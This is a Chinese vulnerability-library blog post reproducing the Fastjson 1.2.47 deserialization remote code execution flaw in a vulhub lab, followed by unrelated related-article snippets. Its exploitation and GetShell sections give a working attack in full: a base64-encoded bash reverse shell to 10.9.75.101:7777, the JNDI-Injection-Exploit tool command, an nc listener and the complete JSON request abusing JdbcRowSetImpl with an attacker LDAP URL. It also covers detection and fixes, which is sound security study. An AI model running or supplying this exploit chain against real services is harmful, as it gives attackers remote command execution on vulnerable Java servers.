【漏洞库】Fastjson_1.2.47_rce

news2024/11/25 13:16:47

文章目录

    • 漏洞描述
    • 漏洞编号
    • 漏洞评级
    • 影响版本
    • 漏洞复现
      • - 利用工具
      • - 漏洞环境
      • - 漏洞扫描
      • - 漏洞验证
      • - 深度利用
      • - GetShell
      • - EXP 编写
    • 漏洞挖掘
      • - 寻找入口点
      • - 指纹信息
    • 修复建议
      • - 漏洞修复
    • 漏洞原理

漏洞描述

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

漏洞编号

CNVD-2019-22238

漏洞评级

严重

影响版本

< Fastjson 1.2.47 及之前的版本

漏洞复现

- 利用工具

链接:https://pan.baidu.com/s/1KEl1Z9Z3hWXKtENLxSE1wg?pwd=yuan 

- 漏洞环境

vulhub的靶场环境:vulhub/fastjson/1.2.47-rce](https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce)

运行测试环境:

docker compose up -d

环境运行后,访问http://your-ip:8090即可看到JSON格式的输出:

image-20230908172805694

- 漏洞扫描

手工主动测试,利用非法json格式来尝试获取回显:

如图我们可以看到,服务端返回报错内容中包含fastjson。

- 漏洞验证

借助DNSLog,让目标服务器访问,查看回显

image-20230908172442160

发现有回显,说明存在漏洞

image-20230908172408509

- 深度利用

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具开启JNDI服务:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A "10.9.75.101"

以下命令的解释:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

这是一个在bash shell中执行的命令,它涉及到了bash、echo、base64和管道操作符。首先,{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=}部分将字符串YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=作为参数传给echo命令,然后输出。接着,输出被传递给base64 -d进行解码,最后解码的结果再传递给bash -i进行执行。其中,{bash,-i}部分表示使用交互模式运行bash

其中的base64编码是通过这个网站进行编码的:https://ares-x.com/tools/runtime-exec/

编码过程如图:

image-20230908173611333

执行开启服务的命令之后,如图所示,表示已经开启了不同java版本的rmi服务与ldap服务:

image-20230908173808090

- GetShell

kali开启监听:

nc -lvvp 7777

发送请求包:

POST / HTTP/1.1
Host: 10.9.75.101:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 261

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://10.9.75.101:1389/zbcmsg",
        "autoCommit":true
    }
}

image-20230908174059606

发送之后,可以看到kali已经获得反弹Shell

image-20230908174134695

- EXP 编写

这里直接使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C 参数指定EXP(这里的EXP使用反弹shell),不过这个EXP需要通过base64编码:

bash -i >& /dev/tcp/10.9.75.101/7777 0>&1

通过网站在线编码:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

其中的base64编码是通过这个网站进行编码的:https://ares-x.com/tools/runtime-exec/

编码过程如图:

image-20230908173611333

将以上编码结果交给 -C参数,再使用 -A参数指定JNDI服务所处的服务器IP地址,执行jar包之后就会生成EXP并且将EXP放置JNDI服务中。

漏洞挖掘

- 寻找入口点

  1. 找到发送JSON序列化数据的接口

  2. 判断是否使用fastjson,利用非法json格式来尝试获取回显:

    如图我们可以看到,服务端返回报错内容中包含fastjson。

  3. 通过BP插件检测该fastjson版本是否存在漏洞

    https://github.com/zilong3033/fastjsonScan
    

    下载插件导入BP

    抓包发送到插件进行检测:

    在这里插入图片描述

如下检测结果:存在漏洞

image-20230908182543255

- 指纹信息

通过异常json输入之后的响应回显,判断是否使用fastjson

修复建议

- 漏洞修复

  1. 升级Fastjson到最新版

  2. 使用安全产品过滤非法内容

    比如请求包中如果出现了JdbcRowSetImpl,就可以把他拦住。
    
  3. 更换其它序列化工具 Jackson/Gson

漏洞原理

不同版本的fastjson其实就是对一些输入的数据进行了校验等操作,绕过校验之后底层的利用链还是一样的。以下是fastjson反序列化漏洞的本质:

  1. 由于将JSON数据进行反序列化的时候会自动调用方法中的 get/set/is方法。

  2. 所以如果有方法在自动调用get/set/is方法的时候能访问远程资源,那么就可以借助这个方法完成利用。

  3. 很巧的是,JDK8中恰好有个JdbcRowSetlmpl类,里面就有 set方法 setAutoCommit,这个方法里面调用了connect方法,connect方法里面又具有JNDI的lookup方法,lookup方法里面传的恰好又是get方法,所以我们可以编写一个payload,利用@type指定要序列化的类,然后指定一些要反序列化的属性,即可完成利用链,接下来就看利用链中的源码:

  4. 利用JdbcRowSetlmpl类中的方法setAutoCommit()

    image-20230716150420480

  5. 进入connect方法:

    image-20230716150603925

    我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行。

    为什么下载我们的EXP后会自动执行呢?

    因为我们的exp具有静态代码块或者构造方法,当程序创建实例的时候,就会自动触发构造方法或者静态代码块的内容。

    如下图中的NamingManager类,其中利用反射创建实例,然后就直接触发恶意代码中的静态代码块内容,从而让我们利用。

    image-20230715133800679

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/989085.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Python多进程爬取电影信息

观察翻页时详情页面url地址变化规律 import json from os import makedirs from os.path import exists import requests import logging import re from urllib.parse import urljoin import multiprocessing# 定义了下日志输出级别和输出格式 logging.basicConfig(levellog…

Java——》synchronized编译

推荐链接&#xff1a; 总结——》【Java】 总结——》【Mysql】 总结——》【Redis】 总结——》【Kafka】 总结——》【Spring】 总结——》【SpringBoot】 总结——》【MyBatis、MyBatis-Plus】 总结——》【Linux】 总结——》【MongoD…

python+selenium自动化测试项目实战

说明&#xff1a;本项目采用流程控制思想&#xff0c;未引用unittest&pytest等单元测试框架 一.项目介绍 目的 测试某官方网站登录功能模块可以正常使用 用例 1.输入格式正确的用户名和正确的密码&#xff0c;验证是否登录成功&#xff1b; 2.输入格式正确的用户名和不…

想做交传翻译,如何成为一名专业的交传译员?

据了解&#xff0c;交传翻译指的是在会议进行过程中&#xff0c;译员快速地记录演讲者发言内容&#xff0c;在主讲者发言间隙&#xff0c;将上一段演讲内容翻译成目标语言并演讲个观众听。那么&#xff0c;如何成为一名专业的交传译员&#xff1f; 交传译员必须具备的能力有哪…

阿里云ubuntu服务器搭建ftp服务器

阿里云ubuntu服务器搭建ftp服务器 服务器环境安装步骤一.创建用户二.安装 vsftp三 配置vsftp四.配置阿里云安全组 服务器环境 阿里云上的云服务器&#xff0c;操作系统为 ubuntu20.04。 安装步骤 一.创建用户 为什么需要创建用户&#xff1f; 这里的用户&#xff0c;指的是…

Spring MVC入门必读:实现增删改查

目录 引言 一、前期准备 1.1.搭建Maven环境 1.2.导入pom.xml依赖 1.3.导入配置文件 ①jdbc.properties ②generatorConfig.xml ③log4j2.xml ④spring-mybatis.xml ⑤spring-context.xml ⑥spring-mvc.xml ⑦修改web.xml文件 二、逆向生成增删改查 2.1.导入相关u…

Visual Studio 2022 同步代码报错:Authentication failed...

1.使用其他git GUI工具&#xff0c;例如&#xff1a;TortoiseGit 能够正常拉取和推送项目&#xff0c; 但如果使用Visual Studio 2022 里面的git 代码管理工具拉取项目时&#xff0c;报错弹窗如下。 打开输出窗口,查看报错详细&#xff1a;点击Visual Studio 2022顶部菜单栏里…

win11和虚拟机上的ubuntu系统共享文件夹

出发点&#xff1a;有时候需要在虚拟机内和win11系统之间进行文件拷贝操作&#xff0c;但是虚拟机内的Vmware Tools不好用 解决方式 开启虚拟机共享文件夹 在虚拟机的Ubuntu系统内的终端命令行输入以下命令 sudo /usr/bin/vmhgfs-fuse .host:/SVMware /mnt/win -o subtype…

selenium 自动化测试:如何搭建自动化测试环境,搭建环境过程应该注意的问题

最近也有很多人私下问我&#xff0c;selenium学习难吗&#xff0c;基础入门的学习内容很多是3以前的版本资料&#xff0c;对于有基础的人来说&#xff0c;3到4的差别虽然有&#xff0c;但是不足以影响自己&#xff0c;但是对于没有学过的人来说&#xff0c;通过资料再到自己写的…

2024年天津农学院专升本增加水文与水资源专业更名报考范围的通知

天津农学院2024年关于增加高职升本科“水文与水资源工程” 报考专业范围的通知 各位考生&#xff1a; 根据教育部《职业教育专业目录&#xff08;2021年&#xff09;》&#xff08;教职成〔2021〕2号&#xff09;相关内容要求&#xff0c;天津农学院专升本“水文与水资源工程”…

代码随想录算法训练营第45天 | ● 70. 爬楼梯 (进阶)● 322. 零钱兑换 ● 279.完全平方数11

文章目录 前言一、70. 爬楼梯 &#xff08;进阶&#xff09;二、322. 零钱兑换三、279.完全平方数总结 前言 完全背包&#xff1b; 一、70. 爬楼梯 &#xff08;进阶&#xff09; 第44天的blog里面有提到这个题目&#xff0c;本质上还是完全背包&#xff1b;另外&#xff0c;例…

spring-secrity的Filter顺序+自定义过滤器

Filter顺序 Spring Security的官方文档向我们提供了filter的顺序&#xff0c;实际应用中无论用到了哪些&#xff0c;整体的顺序是保持不变的: ChannelProcessingFilter&#xff0c;重定向到其他协议的过滤器。也就是说如果你访问的channel错了&#xff0c;那首先就会在channel…

【LeetCode-中等题】79. 单词搜索

文章目录 题目方法一&#xff1a;递归 回溯 题目 方法一&#xff1a;递归 回溯 需要一个标记数组 来标志格子字符是否被使用过了先找到word 的第一个字符在表格中的位置&#xff0c;再开始递归递归的结束条件是如果word递归到了最后一个字符了&#xff0c;说明能在矩阵中找到单…

学历低不能学编程?

最近&#xff0c;有小伙伴向小编提问&#xff1a;自己学历低是否可以学编程呢&#xff1f;围绕这个问题&#xff0c;相信也有不少小伙伴也有这个疑问&#xff0c;那就让我们一起来揭晓这个谜底吧&#xff01; 答案是&#xff1a;当然可以&#xff01;为什么呢&#xff1f; 首…

在线积分求解网站和求解举例

在线积分求解网站和求解举例 在进行复杂计算时&#xff0c;有时会遇到积分求解的问题&#xff0c;基于大学高数、积分变换、复变函数或者矩阵论等理论知识可以通过解析方式求解所遇到的积分问题。在这个求解过程中&#xff0c;能够清晰的理解积分求解基本知识和技巧。有时&…

macbook命令行乱码处理办法

作者&#xff1a;吴业亮 博客&#xff1a;wuyeliang.blog.csdn.net 1、设置编码 2、在终端下输入在这里插入代码片 vi ~/.zshrc在文件内容末端添加&#xff1a; export LC_ALLen_US.UTF-8 export LANGen_US.UTF-8最后再让设置生效 source ~/.zshrc

web请求cookie中expires总结

用意 cookie 有失效日期 "expires"&#xff0c;如果还没有过失效期&#xff0c;即使重新启动电脑&#xff0c;cookie 仍然不会丢失 注意&#xff1a;如果没有指定 expires 值&#xff0c;那么在关闭浏览器时&#xff0c;cookie 即失效。 设置 如果cookie存储时间大…

【GO语言基础】变量常量

系列文章目录 【Go语言学习】ide安装与配置 【GO语言基础】前言 【GO语言基础】变量常量 【GO语言基础】数据类型 【GO语言基础】运算符 文章目录 系列文章目录常量和枚举变量声明全局变量声明大小写敏感 总结 常量和枚举 使用const关键字声明常量&#xff0c;并为每个常量提…

游戏平台加盟该怎么做?需要准备什么?

游戏平台加盟是一种合作模式&#xff0c;允许个人或企业以加盟商的身份参与游戏平台&#xff0c;并从中获得一定的权益和收益。以下是一些步骤和需要准备的事项&#xff0c;来考虑如何进行游戏平台加盟&#xff1a; 步骤&#xff1a; 研究市场和平台&#xff1a;了解游戏市场和…

【Python+selenium】自动化生成测试报告

批量执行完用例后&#xff0c;生成的测试报告是文本形式的&#xff0c;不够直观&#xff0c;为了更好的展示测试报告&#xff0c;最好是生成HTML格式的。 unittest里面是不能生成html格式报告的&#xff0c;需要导入一个第三方的模块&#xff1a;HTMLTestRunner 一、入HTMLTe…